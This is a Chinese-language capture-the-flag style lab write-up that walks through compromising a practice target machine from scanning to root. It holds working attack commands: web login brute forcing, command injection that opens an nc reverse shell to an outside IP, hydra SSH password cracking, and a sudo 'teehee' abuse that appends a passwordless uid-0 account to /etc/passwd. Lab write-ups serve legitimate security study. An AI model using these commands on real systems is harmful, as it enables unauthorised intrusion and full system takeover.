靶机练习11

靶机11

信息收集

老规矩nmap跑一下发现目标IP132开放22和80端口

打开网站看一眼发现是个登陆页面，首先想到的就是密码爆破

在这里是admin界面我选择sniper，payload给的top1000，爆出来密码为happy

登陆进有个命令执行的

run以下提示我们用的命令是ls -l，那在这个地方尝试能不能替换命令

抓个包，发现这里空格改为用+号连接

一般情况我们可以先用容易被ban的命令或者关键字来测一下有没有对常见的这些东西进行过滤

这里用echo+123试一下，是有用的

尝试用命令nc+-e+/bin/bash+192.168.12.138+8888来反弹shell，成功

有python环境 先给个python交互式shell python -c 'import pty; pty.spawn("/bin/bash")'

老规矩先看眼/etc/passwd

cd 到家目录发现有三个用户jim和sam和charles

进到jim里发现有个备份文件里有个旧密码文件（很可能就包含了jim的密码）而且可以直接查看，开启9000端口的http服务把旧密码文件下载下来

用命令hydra -l jim -P 8989.txt ssh://192.168.12.132 -v来ssh密码爆破出jim的密码是jibril04 -l接用户名，也可以接用户名文件 -P接密码文件 -v 显示密码爆破的过程

ssh登陆上jim

ls-la看到还有一个mbox文件，打开来发现是一个邮件信息

因为linux不同的用户，不同的用户都可以发送邮件，在这可以去/var/mail目录下找邮件 发现有

打开看看，说的是给了jim一个密码 ^xHhA&hvim0y

那这下我们就可以登陆到charles了

sudo -l看看有没有sudo提权，发现有这个命令/usr/bin/teehee可以，但是这个命令没见过（看起来和tee这个命令很像） teehee --help看一下帮助文档

加-a的参数我们可以再文件中追加一些内容，用命令 echo 111 | sudo teehee -a ky.txt往ky.txt中写入111

因为用teehee命令用的root权限，并且还有往文件写入的功能，所以我们可以往/etc/passwd下写入一个root用户（linux是看id=0来确定是否为管理员）先构造好 "admin::0:0:::/bin/bash" 再写入

su admin提权成功

cd到root目录下拿到flag